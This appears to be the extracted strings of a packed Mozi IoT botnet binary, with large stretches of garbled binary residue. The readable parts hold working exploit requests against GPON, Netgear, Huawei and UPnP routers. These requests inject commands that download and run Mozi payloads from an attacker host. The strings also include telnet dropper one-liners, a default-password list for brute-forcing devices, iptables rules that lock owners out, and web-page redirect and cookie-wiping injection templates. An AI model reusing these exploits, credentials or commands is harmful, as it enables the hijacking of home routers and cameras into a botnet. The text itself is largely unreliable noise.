'?H7]w
-`th 0
P2!!(9
&tE> `
;'[:x'EH/j
%""]oK
X3KDyIo{k
i` ;[+
7+ K>M
'1bai~
C[v=:C
!|!x!tQ
!p!l!h
G piv!
!kOO#?
dQ0P HS
#Ps8WW
[u E/^
i|xtpl
tplhd`
?SddHFC
4p{# GS
(h+,pK. +#
\_C ed
_@P[[t
YH gQ/
`Cf PjV`q~3
d`\XTPd(
RqDSWK0$
e*W;~'''G?DM<
4M\XTPx5
XTPLHD
A3##$k
W?rreD
7P!&E[
ijV*VE
#aH,[s
'kCXW
K+hdqa
pCa=^#?7C
({f~oYT
@V!G";.
k(S#O"W
;?$tQ
$d`{_EaS
7[_b;g
NPA3;o
<Kgw*B
b!}O@s
4M3CDe$d"@
$83W4Re
k +%G%'
OL`%Wh
l Hi0%
oHN@'d
|xtpxU4
$^g$wE#
(s|xS
sx' O|
t]XKTP
4Mlhd`\f*
Ghd`\@
$(,04m/
8'"3G<b
PTX\`M
4Mdptx|
O[GCl u
SGC@(`
_ W=H7B
1ze23R'
=4,;X#A
UXO[-g G
WCA' ;
gbnQT
AewI'b73
4Mhlpt_x
ff4Gfg
4M,($ H
++P4BW
dO +7$
D7?'4q"
scw[XE
o Sw|7
L+2$C6
!dkL [
Csogow
/O{`w#k
e!K#$$%
ddeefft
4MCDDEEF2
}gm`A4
`_S_[d
HN*`!/
HD@<84
iddgge
DEECC`
4MOV[
b!G([T
&EK+hR-
p8;7/73
46#bC;
******
,&&S&2
<_&<#
p+ >!O
2'Q#AD
BPcm@
#&Owb4
$$$$$$
?6M48<
BP#3fg
X?([
@c&4ZC$
{'Sw5/
\CT Ho
X04O(,_
=*kWPWT3
1,_CcV
@+#:TA
UP(G<c
B6OgOLL
3%fGFd
qOF =
S'QuQ,'
{o /gok
Xa**4["
d"90 P
E`H;C/
C0DEJ/
Uwj0;7
.XRU,;[
+(s "h
+CG/A|
Z # D
eY X
o`i:LCS/
x{:H"jC
SK[{;A16
xc|CAG
oX\`dh'
,lptx|
-KdQ?oE
&A4&iC<0
gX^*Ho
F"^Qp
C8%qxP8
4Mxtplhdc
4plhd`
!@S2X3$"
04CH3$
7D0#,uT
cW# 0DG
Uf8;gf
\wGl,B
/;E/2E#g
^G?d'O
4G%/C!
j]"TWKi
7Kpue[
ZC{_c?
gwpI8KS
$7/C M3
'_/ M,D
1H<dGe!
f O>Pi
i8#U>#
4MSw`O
pXA3fr
!!!!!!
n9@Ho@{B
rR8R4R
Q&d+k
e`0h ki
7/@^`W@
(,<8<'8
iXX` d
UW#Rc:
heGK<'
Fo0{ok
eYXTPLH
$ ($!c
#*xe@o
Bmoq?R
4F;,(j
@8S&`g#
oFC;;Wx
0CV"S_
k'w4qj
'/3/c:
+2MHD Dq
UXQ# _
"/l&6P
$b{'92
_@4y*d
6*"^wjx
$))xFS
/ij+!S3
/7A"%]!
sl#Qe*xb`+
;ESGC
se0AG(
'[D{+-
Zco?d@
4:jSx3d
/"OO_8
i@" kes\
wXk7g*^
O=7+P3Bv
= F" 2E
VBND3%
$lG,#C
]!:5'^-
h'0@I H
a+[#w#
~o{s(G
[P{+:
.;;.8_
FSc,NA
@.H[p#
M j%?&
1"Z6?d
hd`{o]
'mC "k
)XYACW
K ]C]
OST /cdn-cgi/
HTTP/1.1
User-Agent:*
/2ookie
?[url=[
t yror;
%d which means
rundev/;
ymntho
Keep live
?reamRe
"+://baid
no! a3
/-3<Cl
nulvc#
l)+=i6o.\
%c+=lor{kO
kt%dS$v'
e3gp$80
awei3r06/D65
na)mcr
1:v4:JBl
2Ew_czeo
wayakk
URL "k
sMozip
mIWNPU
j DROP
;:23;mL
S95=by:/Bz
+PdtM
Kud?ud
MnZ[n;cpu
ACCEPT
B667PRERd
;zGx*m
cidThiGT
} QQn'/iH[
msm/sxbtq:68[?@
~<[.#g
9.33.59
|130398
ly{ml>
">J myTil
"E? "&"
gojs/?
:0px;pN
w'th='
0%' vhX
'd(a,n){
SE_SSID'm
(/i="2!
4i]+'.
}[0])~)u;
#homX;
ch(/+e
848lSB#
OK(#E-
17 Jul
3:5350Ca
USat265Po
5$`j4p(dm
gjk=-9c
5%)zfhc<c
iw?lta*
7$g`lj&6!g
?:-j6)370+0$m
tctc$'BNtctca)
C! 22##
k3FTWDT;a
py2nka&
ABCDEFGHIJKLMN
QRoUVWXYZ
AJCLEGOG
NKQVGLK
uEzAs4
jvv[nmmQ
0NRkegv>
vqBPAGb
sWGP[C
IkA/{i
A|WFD6G
pK6"o\
ooCAqV
"%c"'-S
52@6[m
=Jif=&
4ps6l4[
0n1FINISH
jpp=sm
x-O$GMJ
xUSR-G806
xDSL R/
8gbna1
xc351?Vev
@p8p0r2^
xJ4pCYeW
RPhrQjGzk[h@3
2LuyDw1
;a0wjuX
lxx7ujM
eNeXiS@1
[]A\A]
KpibSs
POl@QeL
@3)(dA
<OpCrR
+\+WVS
H!@kL>
B@AN.Y@Q6#
B; k"+ =r{
~%&OuCd
w"'%c0
Sd)css/
AQ!;,n
*?~wMw
@@H`P
3s ,k
\`k+c
0sl'F Gl
@.3x|]
s$Q`C M$
9||(-|},
3}=[x`
t<NewE.4
#6lIPAd
8.#0-9]%
/xupnp:
xMap(G
UDP3In
#/[64]G
:13WAN'd
PP0<ce
-SEARCH *[
/MX: 5
HC-NVS
"utf-O
5t1 %s
m" $7dH?
n&lo ,
.0so.k
/e1/S/b
;.;}Bxf
<InInK
`HH*I`)
hlLjztqZ
xXou<fFeEgT
{#'IQ;
!"'.Y]
()*+,j
;<=>?@
7~2h[\^_`
H6:wVa
:*xV + g(l-C
ApX7B,k
qfx){G
vz/Rs%
KalZlQDl
qp'cDwr
p=(T$a84]y
+XENIX
Dk4\Ou
l+/`?{
pa7*75cho
:T^8rv
OST /GponForm/diag_
es/ HTTP/1.1
Host: 127.0
C9necti
keep-alive
t-Enco
gzip, deflat w
User-Aon
gth~18
}Name=
&wan_{n
=``;w8t+http://%s
:%d/Mo
>/tmp/gm
Fcs7c.xml
SOAPA&
Uhe_s-upn
oe:WANIPT1#AddP
o!tMap
0" ?><
@pe n
Style<
2RNewR-
>47450%
l>TCP!
In4382
var/;
t~.cgi?l
\SrfC*w
xk^.Gm=1
trlt/De
Upgrade_1
u"oriza
~dslf-
", rehk
Huaweiw G
n#c/88645
fb1f9e
569d75
v30)un'
vlbspJs812f8o
43a42db38f4
5F2aM97ew
2Ed1a25
URL>$(/bd
hvDown
UAWEIUP
&qu ot;
1>`cdZ &&
DEATH*2.d
HNAP1/,!$x
"v@.ar
tf-8"+
Lks.comj+0
jx2"w[
21/Zh_
XMLS5-G2a
rA}foob
192168,d
/Swe#sh${IFS}xbV
D{&>rU9r
q=0.9,
}49152
board
~_Nt^j
wWFv^b
Oo~NfZ
IdM/<
ad2:id2bo8
$,4<{M
4DPT`6s{
;'d'l?
u ;&O\x46
y538#ht
4e\o'l
DP\[[Y
hpwO4
8DLT\M
4M\hpg/o!
mh8AFOKo\,
I^<W(
(!PROT_EXEC|PROT_WRITE failed.
$Info: This file is packed with the UPX executable packer http://upx.sf.net $
$Id: UPX 3.95 Copyright (C) 1996-2018 the UPX Team. All Rights Reserved. $
/proc/self/exe
!/proc/self/exe7
!X4BPU
nplM$(!9W
c"H#_]
30 ,(;$
.shstrtab
eh_fram{
*go=sbs
mdebug._i32
POST /cdn-cgi/
HTTP/1.1
User-Agent:
Host:
Cookie:
socket error
packet send2 error %d which means %s
packet send error %d which means %s
.config
%d.%d.%d.%d
GET /c HTTP/1.0
Host: %s
%hhu.%hhu.%hhu.%hhu
8.8.8.8 114.114.114.114
/var/tmp/
/var/run/
/dev/shm/
/proc/
/home/
[/cnc]
HTTP/1.1
Content-Length:
Content-Type:
GET %s HTTP/1.1
Host: %s
Connection: Keep-Alive
Content-Type: application/octet-stream
Referer: http://baidu.com/%s/%s/%d/%s/%s/%s/%s)
GET %s HTTP/1.1
Host: %s
Connection: Keep-Alive
Content-Type: application/octet-stream
no aliases
http://
https://
%lu.%lu.%lu.%lu
(null)
http://ipinfo.io/ip
[/dip]
[/atk]
loginok
Host: %s
Server:
Content-Length
complete
gpon8080
gpon80
realtek
netgear8080
netgear80
huawei
camcrossweb
camjaws
vacron
1:v4:JBls
%d%c%d%c%d%c%d%c
8.8.8.8
/proc/net/route
/proc/mounts
/etc/rc.d/rc.local
/etc/rc.local
exit 0
exit 1
cfgtool set /mnt/jffs2/hw_ctree.xml InternetGatewayDevice.ManagementServer URL "http://127.0.0.1"
cfgtool set /mnt/jffs2/hw_ctree.xml InternetGatewayDevice.ManagementServer ConnectionRequestPassword "acsMozi"
iptables -I INPUT -p tcp --destination-port 35000 -j DROP
iptables -I INPUT -p tcp --destination-port 50023 -j DROP
iptables -I OUTPUT -p tcp --source-port 50023 -j DROP
iptables -I OUTPUT -p tcp --source-port 35000 -j DROP
iptables -I INPUT -p tcp --destination-port 7547 -j DROP
iptables -I OUTPUT -p tcp --source-port 7547 -j DROP
iptables -I INPUT -p tcp --dport 35000 -j DROP
iptables -I INPUT -p tcp --dport 50023 -j DROP
iptables -I OUTPUT -p tcp --sport 50023 -j DROP
iptables -I OUTPUT -p tcp --sport 35000 -j DROP
iptables -I INPUT -p tcp --dport 7547 -j DROP
iptables -I OUTPUT -p tcp --sport 7547 -j DROP
/mnt/jffs2/Equip.sh
%s%s%s%s
#!/bin/sh
/mnt/jffs2/wifi.sh
/mnt/jffs2/WifiPerformance.sh
busybox
%255s %255s %255s %255s
/bin/sh
/bin/bash
/etc/rc.d/
/etc/rcS.d/
%s%s%s%s%s
/etc/init.d/S95baby.sh
iptables -I INPUT -p tcp --destination-port 58000 -j DROP
iptables -I OUTPUT -p tcp --source-port 58000 -j DROP
iptables -I INPUT -p tcp --dport 58000 -j DROP
iptables -I OUTPUT -p tcp --sport 58000 -j DROP
/usr/local/ct
rm /home/httpd/web_shell_cmd.gch
echo 3 > /usr/local/ct/ctadmincfg
/usr/local/ct/ctadmin0
sendcmd 1 DB set MgtServer 0 Tr069Enable 1
sendcmd 1 DB set PdtMiddleWare 0 Tr069Enable 0
sendcmd 1 DB set MgtServer 0 URL http://127.0.0.1
sendcmd 1 DB set MgtServer 0 UserName notitms
sendcmd 1 DB set MgtServer 0 ConnectionRequestUsername notitms
sendcmd 1 DB set MgtServer 0 PeriodicInformEnable 0
sendcmd 1 DB save
[count]
[/count]
[/ver]
/dev/urandom
/dev/random
%ld%s%s
/overlay
mount -o remount,rw /overlay /
/overlay/upper
/overlay/upper/usr
/overlay/upper/etc
/overlay/upper/etc/rc.d
/overlay/upper/etc/init.d
/overlay/usr
/overlay/etc
/overlay/etc/rc.d
/overlay/etc/init.d
/usr/networks
/usr/networkstmp
mv -f %s %s
confirmed.list
new.list
%s %d %s %s %s %d %s
-update
2:id20:
9:info_hash20:
6:target20:
5:token
5:nodes
6:nodes6
6:valuesl
4:wantl
1:y1:r
1:y1:e
1:y1:q
1:q4:ping
1:q9:find_node
1:q9:get_peers
1:q13:announce_peer
d1:eli%de%d:
e1:t%d:
1:y1:ee
d1:rd2:id20:
5:nodes%d:
6:nodes6%d:
1:y1:re
d1:ad2:id20:
4:wantl%s%se
e1:q9:find_node1:t%d:
1:y1:qe
e1:q4:ping1:t%d:
[/cpu]
iptables -I INPUT -p udp --destination-port %d -j ACCEPT
iptables -I OUTPUT -p udp --source-port %d -j ACCEPT
iptables -I PREROUTING -t nat -p udp --destination-port %d -j ACCEPT
iptables -I POSTROUTING -t nat -p udp --source-port %d -j ACCEPT
iptables -I INPUT -p udp --dport %d -j ACCEPT
iptables -I OUTPUT -p udp --sport %d -j ACCEPT
iptables -I PREROUTING -t nat -p udp --dport %d -j ACCEPT
iptables -I POSTROUTING -t nat -p udp --sport %d -j ACCEPT
0.0.0.0
This node doesn't accept announces
dht.transmissionbt.com:6881
router.bittorrent.com:6881
router.utorrent.com:6881
bttracker.debian.org:6881
212.129.33.59:6881
82.221.103.244:6881
130.239.18.159:6881
87.98.162.88:6881
<html><head></head><body><script type="text/javascript">var myTime = setTimeout("Timeout()", 3000); function Timeout() { document.location.href = document.URL + (~document.URL.indexOf("?") ? "&" : "?") + (new Date().getTime());} </script><script type="text/javascript" src="
/gojs/?
"></script></body></html>
<html><head><title></title><body style="overflow-x:hidden;overflow-y:hidden;margin:0px;padding:0px"><iframe width='100%' height='100%' name="main" frameborder='0' border="0" marginwidth="0" marginheight="0" src="
" ></iframe><iframe width='0' height='0' name="hide1" frameborder='0' border="0" marginwidth="0" marginheight="0" scrolling="no" allowtransparency="yes" src="
" style="display:none" scrolling="no"></iframe></body></html>
<html><body><script type="text/javascript">function d(a,n){var c=a.length,b=a[c-1];if(n&&n!='SE_SSID'){for(var i=c-2;i>=0;i--){b=a[i]+'.'+b;document.cookie=n+'=; domain='+b+'; expires=Mon,01-Jan-1973 00:00:01 GMT';}}}(function (){var a=document.cookie.split('; ');for(var i=0;i<a.length;i++){d(location.hostname.split('.'),a[i].split('=')[0])}})();(function(u){if(window.navigate&&typeof navigate=='function')navigate(u);var ua=navigator.userAgent;if(ua.match(/applewebkit/i)){var h = document.createElement('a');h.rel='noreferrer';h.href=u;document.body.appendChild(h);var evt=document.createEvent('MouseEvents');evt.initEvent('click', true,true);h.dispatchEvent(evt);}else{document.write('<meta http-equiv="Refresh" Content="0; Url='+u+'" >');}})('
');</script></body></html>
" ></iframe></body></html>
document.write('<script language="javascript" src="http://
veri=20190909
"><\/script>');
?veri=20190909"><\/script>');
?veri=20190909"></script>
The URL has moved <a href="http://
">here</a>
?src=2876103848"><\/script>');
if(top.location==self.location){document.write('<script language="javascript" src="
?src=2876103848"><\/script>');}
HTTP/1.1 301 Moved Permanently
Location: http://
HTTP/1.1 200 OK
Content-Length:
Content-Type: text/html; charset=iso-8859-1
Server: BWS/1.1
Last-Modified: Wed, 17 Jul 2000 03:53:05 GMT
Cache-Control: no-cache, must-revalidate
Expires: Sat, 26 Jul 2000 05:00:00 GMT
Connection: close
/proc/sys/net/ipv4/ip_forward
[/set]
1(765$`j4p(dmn'b75e-gjk=-9c44`e-gjk(86>5%)zfhc<c,a57s)ali*~bne>4%)ziw?lt,a57s)ali*ah,iw?7$g`lj&6!g*aht,oe?7?:-656)370+0$mh
fopen error!
%19s%lx%lx%X%d%d%d%lx%d%d%d
Host:
%u.%u.%u.%u
Referer:
Range: bytes=
User-Agent:
/proc/%s/exe
GET /c
HTTP/1.1 200 OK
Server: nginx
Content-Length: %d
Connection: close
Content-Type: application/zip
%s:loginok
HTTP/1.1 200 OK
Server: nginx
Content-Length: %d
Connection: close
Content-Type: application/zip
UPNP BT
iptables -I INPUT -p tcp --destination-port %d -j ACCEPT
iptables -I OUTPUT -p tcp --source-port %d -j ACCEPT
iptables -I PREROUTING -t nat -p tcp --destination-port %d -j ACCEPT
iptables -I POSTROUTING -t nat -p tcp --source-port %d -j ACCEPT
iptables -I INPUT -p tcp --dport %d -j ACCEPT
iptables -I OUTPUT -p tcp --sport %d -j ACCEPT
iptables -I PREROUTING -t nat -p tcp --dport %d -j ACCEPT
iptables -I POSTROUTING -t nat -p tcp --sport %d -j ACCEPT
/proc/%d/status
%*s %s
/dev/watchdog
/dev/watchdog0
/dev/misc/watchdog
/etc/watchdog
/dev/FTWDT101_watchdog
/dev/FTWDT101\ watchdog
/dev/FTWDT101/watchdog
/sbin/watchdog
/bin/watchdog
/etc/default/watchdog
/proc/net/raw
/proc/net/tcp
dropbear
killall -9 %s
%d: %x:%x %x:%x %x
/usr/bin/python
iptables -I INPUT -p tcp --destination-port 22 -j DROP
iptables -I INPUT -p tcp --destination-port 23 -j DROP
iptables -I INPUT -p tcp --destination-port 2323 -j DROP
iptables -I OUTPUT -p tcp --source-port 22 -j DROP
iptables -I OUTPUT -p tcp --source-port 23 -j DROP
iptables -I OUTPUT -p tcp --source-port 2323 -j DROP
iptables -I INPUT -p tcp --dport 22 -j DROP
iptables -I INPUT -p tcp --dport 23 -j DROP
iptables -I INPUT -p tcp --dport 2323 -j DROP
iptables -I OUTPUT -p tcp --sport 22 -j DROP
iptables -I OUTPUT -p tcp --sport 23 -j DROP
iptables -I OUTPUT -p tcp --sport 2323 -j DROP
killall -9 telnetd utelnetd scfgmgr
abcdefghijklmnopqrstuvw012345678
ABCDEFGHIJKLMNOPQRSTUVWXYZ
255.255.255.255
255.255.0.0
%08X%08X%08X%08X%08X%08X
AJCLEGOG
PGRMPV
AJCLEGOG
NKQVGLKLE
uEzAs"
FGNGVGF
CLKOG"
QVCVWQ"
pgrmpv
jvvrdnmmf"
nmnlmevdm"
XMNNCPF"
egvnmacnkr"
QJGNN"
GLC@NG"
Q[QVGO"
@WQ[@MZ
okpck"
CRRNGV
DMWLF"
LAMPPGAV"
@WQ[@MZ
@WQ[@MZ
vqMWPAG
gLEKLG
sWGP["
PGQMNT
LCOGQGPTGP
aMLLGAVKML
CNKTG"
cAAGRV
CRRNKACVKML
CRRNKACVKML
cAAGRV
nCLEWCEG
aMLVGLV
CRRNKACVKML
WPNGLAMFGF"
QGVaMMIKG
PGDPGQJ
NMACVKML
AMMIKG
AMLVGLV
NGLEVJ
VPCLQDGP
GLAMFKLE
AJWLIGF"
AMLLGAVKML
QGPTGP
FMQCPPGQV"
QGPTGP
ANMWFDNCPG
LEKLZ"
oMXKNNC
uKLFMUQ
cRRNGuG@iKV
aJPMOG
qCDCPK
oMXKNNC
uKLFMUQ
cRRNGuG@iKV
aJPMOG
qCDCPK
oMXKNNC
uKLFMUQ
cRRNGuG@iKV
aJPMOG
qCDCPK
oMXKNNC
uKLFMUQ
cRRNGuG@iKV
aJPMOG
qCDCPK
oMXKNNC
oCAKLVMQJ
cRRNGuG@iKV
tGPQKML
qCDCPK
\x%02x
/bin/busybox cat /bin/ls|head -n 1
/bin/busybox hexdump -e '16/1 "%c"' -n 52 /bin/ls
/bin/busybox cat /bin/ls|more
dd bs=52 count=1 if=/bin/ls || cat /bin/ls || while read i; do echo $i; done < /bin/ls || while read i; do echo $i; done < /bin/busybox
/bin/busybox dd bs=52 count=1 if=/bin/ls || /bin/busybox cat /bin/ls || while read i; do printf $i; done < /bin/ls || while read i; do printf $i; done < /bin/busybox
/bin/busybox chmod 777 .i || (cp /bin/ls .j && cat .i>.j &&rm .i && cp .j .i &&rm .j)
/bin/busybox echo -ne '%s' %s .i; %s && /bin/busybox echo -en '%s'
/bin/busybox echo '%s' %s .i; %s && /bin/busybox echo '%s'
./.i %d %d %d %d %d;./Runn;/bin/busybox echo -e '%s'
nvalid
ncorrect
oodbye
dvrdvs
welcome
success
mdm9625
9615-cdp
connected
>/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://%s:%d/i ||curl -O http://%s:%d/i ||/bin/busybox wget http://%s:%d/i;chmod 777 i ||(cp /bin/ls ii;cat i>ii &&rm i;cp ii i;rm ii);./i;/bin/busybox echo -e '%s'
>/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://%s:%d/bin.sh ||curl -O http://%s:%d/bin.sh ||/bin/busybox wget http://%s:%d/bin.sh;chmod 777 bin.sh ||(cp /bin/ls bix.sh;cat bin.sh>bix.sh;rm bin.sh;cp bix.sh bin.sh;rm bix.sh);sh bin.sh %s;/bin/busybox echo -e '%s'
enable
config terminal
system
linuxshell
>/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;/bin/busybox echo -e '%s'
/bin/busybox wget;/bin/busybox echo -ne '%s'
FINISH
FINISHOK
unknown login
localhost login
none login
phicomm
DAM-2160i
GM login
quopin login
sbs-ipcam login
tango3 login
tangox login
USR-G806 login
goke login
WR9000 login
(none) login
LS-O9710n iss3 login
dvrdvs login
xDSL Router Login
BCM96848
CUAdmin
default
rapport
telnetadmin
!!Huawei
keomeo
support
CMCCAdmin
e8telnet
e8ehome1
e8ehome
mother
Administrator
service
supervisor
admin1
administrator
666666
888888
telnet
xc3511
Pon521
e2008jl
r@p8p0r+
GM8182
25802580
chzhdpl
Fireitup
Zte521
epicrouter
conexant
xJ4pCYeW
v2mprt
PhrQjGzk
h@32LuyD
gw1admin
adminpass
xmhdipc
juantech
@HuaweiHgw
adminHW
2010vesta
2011vesta
plumeria0077
cat1029
123456
hi3518
password
fucker
admin1234
smcadmin
klv123
klv1234
7ujMko0vizxv
7ujMko0admin
system
dreambox
realtek
00000000
1111111
meinsm
88888888
[]A\A]
/proc/self/cmdline
GET /Mozi.6 HTTP/1.0
.shstrtab
.rodata
/proc/self/cmdline
GET /Mozi.7 HTTP/1.0
.shstrtab
.rodata
.ARM.attributes
/proc/self/cmdline
GET /Mozi.c HTTP/1.0
.shstrtab
.rodata
/proc/self/cmdline
GET /Mozi.m HTTP/1.0
.shstrtab
.rodata
.mdebug.abi32
/proc/self/cmdline
GET /Mozi.x HTTP/1.0
.shstrtab
.rodata
/proc/self/cmdline
GET /Mozi.a HTTP/1.0
.shstrtab
.rodata
nK%lf|g['
B; k"+
/Sd"Oce
/proc/self/cmdline
GET /Mozi.s HTTP/1.0
.shstrtab
.rodata
/proc/self/cmdline
GET /Mozi.r HTTP/1.0
.shstrtab
.rodata
/proc/self/cmdline
GET /Mozi.b HTTP/1.0
.shstrtab
.rodata
/proc/self/cmdline
GET /Mozi.4 HTTP/1.0
.shstrtab
.rodata
$ N^NuNV
N^NuNV
N^NuNV
N^NuNV
N^NuNV
N^NuNV
N^NuNV
N^NuNV
dN^NuNV
N^NuNV
N^NuNV
N^NuNV
@N^Nuk
/proc/self/cmdline
GET /Mozi.k HTTP/1.0
.shstrtab
.rodata
/proc/self/cmdline
GET /Mozi.l HTTP/1.0
.shstrtab
.rodata
.mdebug.abi32
@.|c3x|
/proc/self/cmdline
GET /Mozi.p HTTP/1.0
.shstrtab
.rodata
239.255.255.250
upnp:rootdevice
200 OK
Location
%*[^0-9]%[^:]:%d/%s
%*[^0-9]%d
Not Content-Length ,Try read all.
AddPortMapping
GetGenericPortMappingEntry
<NewExternalPort
%*[^0-9]%hd
<NewProtocol
<NewInternalPort
<NewInternalClient
<NewEnabled
<NewPortMappingDescription
%[^<][64]
<NewLeaseDuration>
%*[^0-9]%ld
GetExternalIPAddress
<NewExternalIPAddress
%*[^0-9]%[^<]
URLBase
http://%s:%d
<deviceType>
deviceType
urn:schemas-upnp-org:device:InternetGatewayDevice:1
urn:schemas-upnp-org:device:WANDevice:1
urn:schemas-upnp-org:device:WANConnectionDevice:1
<serviceType>
serviceType
urn:schemas-upnp-org:service:WANIPConnection:1
urn:schemas-upnp-org:service:WANPPPConnection:1
<controlURL>
controlURL
M-SEARCH * HTTP/1.1
ST: %s
HOST: 239.255.255.250:1900
MAN: "ssdp:discover"
Content-Length: 0
GET /%s HTTP/1.1
Accept: text/xml, application/xml
User-Agent: HC-NVS
Host: %s:%d
Connection: Keep-Alive
Cache-Control: max-age=0
POST /%s HTTP/1.1
Host: %s:%d
SOAPACTION: "%s#%s"
CONTENT-TYPE: text/xml; charset="utf-8"
Content-Length: %d
<?xml version="1.0" encoding="utf-8"?>
<s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
<s:Body>
<u:%s xmlns:u="%s">
%s</u:%s>
</s:Body>
</s:Envelope>
<NewRemoteHost></NewRemoteHost>
<NewExternalPort>%d</NewExternalPort>
<NewProtocol>%s</NewProtocol>
<NewInternalPort>%d</NewInternalPort>
<NewInternalClient>%s</NewInternalClient>
<NewEnabled>1</NewEnabled>
<NewPortMappingDescription>%s</NewPortMappingDescription>
<NewLeaseDuration>%d</NewLeaseDuration>
<NewPortMappingIndex>%d</NewPortMappingIndex>
%s%s%m
hlLjztqZ
npxXoudifFeEgGaACScs
+0-#'I
Unknown error
Success
Operation not permitted
No such file or directory
No such process
Interrupted system call
Input/output error
No such device or address
Argument list too long
Exec format error
Bad file descriptor
No child processes
Resource temporarily unavailable
Cannot allocate memory
Permission denied
Bad address
Block device required
Device or resource busy
File exists
Invalid cross-device link
No such device
Not a directory
Is a directory
Invalid argument
Too many open files in system
Too many open files
Inappropriate ioctl for device
Text file busy
File too large
No space left on device
Illegal seek
Read-only file system
Too many links
Broken pipe
Numerical argument out of domain
Numerical result out of range
Resource deadlock avoided
File name too long
No locks available
Function not implemented
Directory not empty
Too many levels of symbolic links
No message of desired type
Identifier removed
Channel number out of range
Level 2 not synchronized
Level 3 halted
Level 3 reset
Link number out of range
Protocol driver not attached
No CSI structure available
Level 2 halted
Invalid exchange
Invalid request descriptor
Exchange full
No anode
Invalid request code
Invalid slot
Bad font file format
Device not a stream
No data available
Timer expired
Out of streams resources
Machine is not on the network
Package not installed
Object is remote
Link has been severed
Advertise error
Srmount error
Communication error on send
Protocol error
Multihop attempted
RFS specific error
Bad message
Value too large for defined data type
Name not unique on network
File descriptor in bad state
Remote address changed
Can not access a needed shared library
Accessing a corrupted shared library
.lib section in a.out corrupted
Attempting to link in too many shared libraries
Cannot exec a shared library directly
Invalid or incomplete multibyte or wide character
Interrupted system call should be restarted
Streams pipe error
Too many users
Socket operation on non-socket
Destination address required
Message too long
Protocol wrong type for socket
Protocol not available
Protocol not supported
Socket type not supported
Operation not supported
Protocol family not supported
Address family not supported by protocol
Address already in use
Cannot assign requested address
Network is down
Network is unreachable
Network dropped connection on reset
Software caused connection abort
Connection reset by peer
No buffer space available
Transport endpoint is already connected
Transport endpoint is not connected
Cannot send after transport endpoint shutdown
Too many references: cannot splice
Connection timed out
Connection refused
Host is down
No route to host
Operation already in progress
Operation now in progress
Stale NFS file handle
Structure needs cleaning
Not a XENIX named type file
No XENIX semaphores available
Is a named type file
Remote I/O error
Disk quota exceeded
No medium found
Wrong medium type
0123456789abcdef
%u.%u.%u.%u.in-addr.arpa
%x.%x.
ip6.arpa
/proc/stat
/proc/cpuinfo
processor
/sys/devices/system/cpu
/dev/null
exit 0
npxXoudifFeEgGaACSncs[
hlLjztq
nfinity
/etc/services
/etc/resolv.conf
nameserver
domain
search
options
timeout
attempts
infinity
/etc/hosts
vr8^T:l)U
POST /GponForm/diag_Form?images/ HTTP/1.1
Host: 127.0.0.1:8080
Connection: keep-alive
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: Hello, World
Content-Length: 118
XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=``;wget+http://%s:%d/Mozi.m+-O+->/tmp/gpon8080;sh+/tmp/gpon8080&ipv=0
POST /GponForm/diag_Form?images/ HTTP/1.1
Host: 127.0.0.1:80
Connection: keep-alive
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: Hello, World
Content-Length: 118
XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=``;wget+http://%s:%d/Mozi.m+-O+->/tmp/gpon80;sh+/tmp/gpon80&ipv=0
POST /picsdesc.xml HTTP/1.1
Content-Length: 630
Accept-Encoding: gzip, deflate
SOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping
Accept: /
User-Agent: Hello-World
Connection: keep-alive
<?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope//" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:AddPortMapping xmlns:u="urn:schemas-upnp-org:service:WANIPConnection:1"><NewRemoteHost></NewRemoteHost><NewExternalPort>47450</NewExternalPort><NewProtocol>TCP</NewProtocol><NewInternalPort>44382</NewInternalPort><NewInternalClient>cd /var/; wget http://%s:%d/Mozi.m; chmod +x Mozi.m; ./Mozi.m</NewInternalClient><NewEnabled>1</NewEnabled><NewPortMappingDescription>syncthing</NewPortMappingDescription><NewLeaseDuration>0</NewLeaseDuration></u:AddPortMapping></s:Body></s:Envelope>
GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://%s:%d/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1 HTTP/1.0
GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://%s:%d/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1 HTTP/1.0
POST /ctrlt/DeviceUpgrade_1 HTTP/1.1
Host: %s:37215
Content-Length: 601
Connection: keep-alive
Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
<?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g %s:%d -l /tmp/huawei -r /Mozi.m;chmod -x huawei;/tmp/huawei huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
POST /UD/act?1 HTTP/1.1
Host: 127.0.0.1:7574
User-Agent: Hello, world
SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
Content-Type: text/xml
Content-Length: 640
